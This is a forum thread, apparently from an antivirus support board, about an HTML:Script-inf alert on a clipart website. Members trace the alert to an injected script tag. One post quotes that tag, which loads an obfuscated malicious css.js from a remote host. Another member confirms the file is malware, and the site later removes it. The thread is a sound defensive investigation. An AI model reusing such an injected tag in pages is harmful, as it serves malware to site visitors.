html script:inf alert

[greytilIdye]

I started getting this alert today on a site, pdclipart.org that has always worked fine previously.

I Googled script:inf and found several Avasr forum posts relating to the issue.

On one post I noticed that Avast had blocked a net stat site.

I used the noscripts add-in in Firefox, and the only 2 scripts the blocked page wants to run are to:

statcounter.com

and

googlesyndication.com

Is either of these causing the problem?

Thanks for your time.

[onlysomeone]

where do you get this alert?
on the main page or when going "deeper" into the site?

yours
onlysomeone

[greytilIdye]

Thanks for the quick reply.

The main site (www.pdclipart.org) is fine, as is the image results page (http://www.pdclipart.org/thumbnails.php)

The alert comes when an image is double clicked (which would open it full size, rather than immediately download it.) and the site tries to go to: http://www.pdclipart.org/displayimage.php?album=search&cat=0&pos=1 where the part after ? simply identifies the postion of the image in the thumbnail table.

It's odd, because NoScript doesn't report any added scripts trying to run at this point.

[onlysomeone]

I did some research on this site and it really seems to be a serious and safe website, but I can't say if this site is really infected or if this is a false positive...
http://www.mywot.com/en/scorecard/www.pdclipart.org

This is the part of the resident Log (link disarmed):

hxxp://www.pdclipart.org/displayimage.php?album=143&pos=1 [L] HTML:Script-inf (0)

I'm sorry because I can't help you any further with this, but I'm sure someone else on this forum can!

yours
onlysomeone

[DavidR]

Neither, the statcounter.com and googlesyndication.com scripts are the problem.

However I have stumbled around in there and not got a single alert. I tried to go to the thumbnails.php link you gave only to get an error, The selected album/file does not exist !

So I had to do a search to return some results and then click on one of them to get the alert.

Now I have had a look at the page code where the alert happens and I can only see one script tag which might possibly be causing this alert and it is one of the google scripts at the end of the page.

But, I'm not convinced it is a good detection, so I have submitted it for analysis.

[greytilIdye]

Thank you both for your prompt help.

It's interesting that it only happened today (yesterday was fine.)

Perhaps one of the new definitions is causing a false positive?

[kubecj]

This is in the middle of the hXXp://www.pdclipart.org/displayimage.php?album=31&pos=7 page:

<!--CAPTION in DB.  It's the Description-->
<!-- <script src=hXXp://cgi35.plala.or.jp/BTO/data/entry/css.js></script><br />-->

And that stuff is malware without any doubt.

[DavidR]

I did see that and did a search on plala.or.jp and looked at WOT (two reports of malware) and norton safe web (nothing indicated). However checking on the cgi35 sub-domain returns more

I couldn't download the actuall css.js as the network shield blocks plala.or.jp

14.04.2009  19:18:04  Network Shield: blocked access to malicious site cgi35.plala.or.jp/BTO/data/entry/css.js

Paused it and got the css.js and yes it is malware detected by the standard shield.

Sign of "VBS:Obfuscated-gen [trj]" has been found in "E:\Downloads\css.js"

A virustotal check shows the css.js as infected 8/40 from a previous upload 2 April 2009, http://www.virustotal.com/analisis/7e07501152f2b39e9d1c0fab5d231a17. Normally I would have it scanned again by I'm in a queue of 4004

[greytilIdye]

Thanks very much to all for your help.

I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

[Lisandro]

I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

Strong password to protect site is a must have policy.

[DavidR]

Thanks very much to all for your help.

I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

You're welcome, hopefully now they can get on to how it got inserted and remove the vulnerability that allowed it.